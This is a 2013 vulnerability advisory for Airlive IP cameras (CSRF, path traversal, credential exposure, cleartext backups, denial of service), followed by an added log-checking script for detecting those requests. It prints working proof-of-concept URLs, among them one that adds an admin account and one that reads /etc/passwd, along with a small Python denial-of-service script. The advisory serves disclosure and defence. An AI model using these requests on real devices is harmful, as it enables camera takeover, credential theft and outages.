Airlive CSRF / Traversal / Disclosure / Denial Of Service

13 Jun 2013 00:00:00 | Reported by Javier Repiso Sanchez | Type: packetstorm | Source: packetstormsecurity.com

`===========================================================================  
AIRLIVE  
===========================================================================  
  
1.Advisory Information  
Title: Airlive Multiple Vulnerabilities  
Date Published: 12/06/2013  
Date of last update: 12/06/2013  
  
2.Vulnerability Description  
Multiple vulnerabilities have been found in these devices:  
-CVE-2013-3540. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)  
-CVE-2013-3541. Relative Path Traversal (CWE-23).  
-CVE-2013-3686. Information Exposure (CWE-200) and Permissions, Privileges and Access Controls (CWE-264)  
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)  
-CVE-2013-3691. Denial of Service  
  
3.Affected Products  
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM  
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.  
It is possible that other models are affected, but they were not checked.  
  
4.PoC  
4.1.Cross Site Request Forgery (CSRF)  
CVE-2013-3540: CSRF via the GET method, usable in a targeted attack against any administrator.  
These cameras use a web interface which is prone to CSRF vulnerabilities.  
A malicious user can attempt targeted attacks by sending a crafted CSRF vector, which allows web interface parameters to be manipulated.  
The following example vector creates an additional user with administrator credentials.  
_____________________________________________________________________________  
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=   
_____________________________________________________________________________  
  
4.2.Relative Path Traversal  
CVE-2013-3541: a path traversal that allows you to read configuration files on the file system.  
_____________________________________________________________________________  
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd  
_____________________________________________________________________________  
  
4.3.Sensitive Information Exposure + Privilege Escalation  
CVE-2013-3686: sensitive data is exposed by requesting the following URL:  
_____________________________________________________________________________  
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID  
_____________________________________________________________________________  
The Admin password can then be decoded (base64).  
We can now log in again as the admin user, which completes the privilege escalation.  
  
4.4.Clear Text Storage of Sensitive Information  
CVE-2013-3687: all the sensitive information about the device is stored in plain text inside the backup file.  
You can open it with any text editor and look for user information, for example passwords, user names and so on.  
  
4.5.Denial of Service (DoS)  
CVE-2013-3691: DoS by overflowing the path ‘/’. A request with a large number of ‘a’ characters can take down the HTTP service of the camera device.  
_____________________________________________________________________________  
Request: http://xx.xx.xx.xx/[a*3000]  
_____________________________________________________________________________  
You will get the following message: Connection has been reset. After removing the added characters and refreshing, you will get the following message: Can't Connect  
  
The service stays down for around 2 min, but if the request is repeated, for example every 1 min, the camera never recovers by itself.  
  
The following Python script could be used to test the DoS:  
_____________________________________________________________________________  
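import socket  
  
cam_ip = 'xx.xx.xx.xx'  # address of the camera under test (placeholder)  
# Request line with a 3000-character path, as described above  
request = b'GET /' + b'A' * 3000 + b'.html HTTP/1.0\r\n'  
s = socket.socket()  
s.connect((cam_ip, 80))  
s.send(request)  
response = s.recv(1024)  
s.close()  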
_____________________________________________________________________________  
  
5.Credits  
  
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.  
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo.  
-CVE-2013-3540, CVE-2013-3686 and CVE-2013-3687 were discovered by Jonás Ropero Castillo.  
  
6.Report Timeline  
-2013-05-31: The student team notifies Airlive Customer Support of the vulnerabilities. No reply received.  
-2013-06-03: The students ask for a reply.  
-2013-06-05: The Airlive team passes the report to technical support to analyze the vulnerabilities.  
`
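
A defender-side companion to sections 4.1, 4.2, 4.3 and 4.5, added here and not part of the original advisory: a Python check that tags access-log lines matching the request shapes shown above. It assumes Combined Log Format logs from a proxy or sensor in front of the camera; the host name `cam.example`, the sample lines and the 1024-byte path threshold are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" ...
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" \d{3} \S+ "([^"]*)"')
MAX_PATH = 1024  # assumed threshold; the advisory's request path is about 3000 bytes

def classify(line, camera_host):
    """Return the CVE ids from the advisory whose request shape this log line matches."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, target, referer = m.groups()
    url = urlsplit(target)
    # parse_qs percent-decodes once; unquote again to catch double encoding
    qs = {k: unquote(v[0]) for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    hits = []
    # 4.1: account creation over GET that did not originate from the camera's own UI
    if (url.path.endswith("/cgi-bin/admin/usrgrp.cgi") and qs.get("action") == "add"
            and method == "GET" and urlsplit(referer).hostname != camera_host):
        hits.append("CVE-2013-3540")
    # 4.2: any ".." path segment in READ.filePath
    if url.path.endswith("/cgi-bin/admin/fileread"):
        if ".." in qs.get("READ.filePath", "").replace("\\", "/").split("/"):
            hits.append("CVE-2013-3541")
    # 4.3: listing of the General.UserID parameter group
    if (url.path.endswith("/cgi-bin/operator/param") and qs.get("action") == "list"
            and qs.get("group", "").startswith("General.UserID")):
        hits.append("CVE-2013-3686")
    # 4.5: oversized request path
    if len(url.path) > MAX_PATH:
        hits.append("CVE-2013-3691")
    return hits

CAM = "cam.example"  # constructed camera hostname
FMT = '198.51.100.7 - - [13/Jun/2013:10:00:00 +0000] "GET %s HTTP/1.0" 200 512 "%s" "-"'
SAMPLE = [  # constructed log lines, request shapes taken from sections 4.1 to 4.5
    FMT % ("/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator"
           "&sgrp=ptz&action=add&redirect=", "http://other.example/page.html"),
    FMT % ("/cgi-bin/admin/usrgrp.cgi?user=op2&pwd=x&grp=operator&action=add",
           "http://cam.example/users.html"),
    FMT % ("/cgi-bin/admin/fileread?READ.filePath=%252e%252e/%252e%252e/etc/passwd", "-"),
    FMT % ("/cgi-bin/operator/param?action=list&group=General.UserID", "-"),
    FMT % ("/" + "a" * 3000, "-"),
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry, CAM), entry[:90])
```

The Referer comparison only separates requests issued from the camera's own pages from cross-site ones; it is a log heuristic, not a replacement for anti-CSRF tokens in the firmware.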
